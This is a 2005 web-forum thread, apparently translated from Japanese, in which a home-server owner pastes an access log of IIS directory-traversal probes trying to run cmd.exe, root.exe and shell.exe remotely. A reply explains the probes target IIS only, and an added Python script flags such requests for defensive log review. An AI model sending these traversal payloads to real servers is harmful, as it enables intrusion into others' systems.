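Posted: 2005/03/01 Created by: 鷹の巣

No.18468 Somewhat puzzling traces are left in my AN HTTPD log.



Somewhat puzzling traces are left in my AN HTTPD log.

No.18468 Posted: 2005/03/01 (Tue) 20:35 Name: RT URL:

Hello. Thanks to everyone here, I have been running a home server since last December.
Some slightly puzzling traces have been left in my AN HTTPD log. Could someone please explain them to me?
If possible, I would also be glad to hear about countermeasures. I am pasting the log below.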

69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:55:58 +0900] "GET /..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:55:59 +0900] "GET /../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:00 +0900] "GET /_vti_bin/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:01 +0900] "GET /_vti_bin/..・c..c5c..c5c..c5c..c5c../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:02 +0900] "GET /_vti_bin/..・c..・c..・c..・c..・c../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:03 +0900] "GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:04 +0900] "GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:05 +0900] "GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:06 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:07 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:08 +0900] "GET /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:09 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:09 +0900] "GET /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:10 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:11 +0900] "GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 211
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:13 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:13 +0900] "GET /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:14 +0900] "GET /iisadmpwd/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:15 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:16 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:17 +0900] "GET /msadc/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:18 +0900] "GET /MSADC/..・c..c5c..c5c..c5cwinnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:19 +0900] "GET /msadc/..・c../..c5c../..c5c../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:20 +0900] "GET /MSADC/..・c..・c..・c..・cwinnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:21 +0900] "GET /msadc/..・c../..・c../..・c../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:22 +0900] "GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:23 +0900] "GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:24 +0900] "GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:25 +0900] "GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:26 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:27 +0900] "GET /../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:28 +0900] "GET /msadc/../・€/ッ../../・€/ッ../../・€/ッ../winnt/system32/cmd.exe/ HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:29 +0900] "GET /msdac/root.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:29 +0900] "GET /msdac/shell.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:30 +0900] "GET /PBServer/..・c..c5c..c5cwinnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:31 +0900] "GET /PBServer/..・c..・c..・cwinnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:32 +0900] "GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:33 +0900] "GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:34 +0900] "GET /Rpc/..・c..c5c..c5cwinnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:35 +0900] "GET /Rpc/..・c..・c..・cwinnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:36 +0900] "GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:37 +0900] "GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:38 +0900] "GET /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:39 +0900] "GET /../../../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:40 +0900] "GET /winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:41 +0900] "GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 211
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:42 +0900] "GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 211
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:43 +0900] "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 211
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:44 +0900] "GET /scripts/..タ ../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:44 +0900] "GET Mozilla/3.0 (compatible; Indy Library) -> /scripts/..Э..Э..Э..Эwinnt/system32/cmd.exe
?/c+dir+c: HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:45 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:46 +0900] "GET /scripts/..誓../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:47 +0900] "GET /scripts/..チ..チ..チ..チwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 211
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:48 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:49 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:50 +0900] "GET /../../../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:51 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:52 +0900] "GET /scripts/..o../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:53 +0900] "GET /scripts/..疏../winnt/system32/cmd.exe HTTP/1.1" 404 215
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:54 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.1" 403 194
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:55 +0900] "GET /scripts/..€ッ../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:56 +0900] "GET /scripts/..€€ッ../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:57 +0900] "GET /scripts/..・€€€ッ../winnt/system32/cmd.exe HTTP/1.1" 400 190
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:58 +0900] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 211
69-151-33-3.ded.swbell.net - - [01/Mar/2005:12:56:59 +0900] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 211


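For web servers other than IIS this is harmless, so it is fine to ignore it.

No.18469 Posted: 2005/03/01 (Tue) 20:45 Name: ほげ URL:

Nice to meet you.

This is a security attack aimed at IIS servers.
For web servers other than IIS it is harmless, so it is fine to ignore it.

As for the details of the attack, search for part of the log and you will find plenty of results.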
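
Added example, not part of the original thread: a Python sketch for checking a log like the one above, which flags directory-traversal probes in Common Log Format lines and lists any probe that was answered with a non-error status. The sample lines and the `.example` host names are constructed; the request shapes follow the log quoted in the question.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines (hosts under .example are invented); the request
# shapes are the ones in the log quoted in this thread, plus one normal hit.
SAMPLE_LOG = r'''
probe.example - - [01/Mar/2005:12:55:58 +0900] "GET /..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
probe.example - - [01/Mar/2005:12:55:59 +0900] "GET /../../winnt/system32/cmd.exe HTTP/1.1" 403 194
probe.example - - [01/Mar/2005:12:56:00 +0900] "GET /_vti_bin/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 215
probe.example - - [01/Mar/2005:12:56:58 +0900] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 211
visitor.example - - [01/Mar/2005:12:57:10 +0900] "GET /index.html HTTP/1.1" 200 1024
other.example - - [01/Mar/2005:12:58:00 +0900] "GET /scripts/..%2f..%2fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 200 512
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*) HTTP/\d\.\d" (\d{3}) \S+$')
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')   # ".." as a path segment
TARGET_RE = re.compile(r'(cmd|root|shell)\.exe', re.I)  # file names requested in the log

def fully_decode(path, rounds=3):
    """Percent-decode until stable so nested encodings are normalised too."""
    for _ in range(rounds):
        decoded = unquote(path, encoding='latin-1')
        if decoded == path:
            break
        path = decoded
    return path

def classify(line):
    """Return (host, status, reasons) for a log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = fully_decode(m.group(2).split('?', 1)[0])
    reasons = [name for name, rx in (('traversal', TRAVERSAL_RE),
                                     ('shell-target', TARGET_RE)) if rx.search(path)]
    return m.group(1), int(m.group(3)), reasons

def summarize(log_text):
    """Count probes per host and collect probes answered without a 4xx/5xx status."""
    probes, answered = Counter(), []
    for line in log_text.strip().splitlines():
        result = classify(line)
        if result and result[2]:
            host, status, reasons = result
            probes[host] += 1
            if status < 400:
                answered.append((host, status, reasons))
    return probes, answered

if __name__ == '__main__':
    probes, answered = summarize(SAMPLE_LOG)
    print(dict(probes), answered)
```

An empty second list corresponds to the log in the question, where every probe received 400, 403 or 404; any entry in it means a probe was served content and that request deserves a closer look.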


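Thank you.

No.18472 Posted: 2005/03/01 (Tue) 21:02 Name: RT URL:

ほげ-san, thank you very much!
Thanks to you, I can keep running the server with peace of mind!

Actually, this is the second time I have had an attack like this, and I was really panicking.

What a relief!


It turned out much longer than I expected.

No.18471 Posted: 2005/03/01 (Tue) 20:59 Name: RT URL:

It turned out much longer than I expected (sweat).
Sorry <(_ _)>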

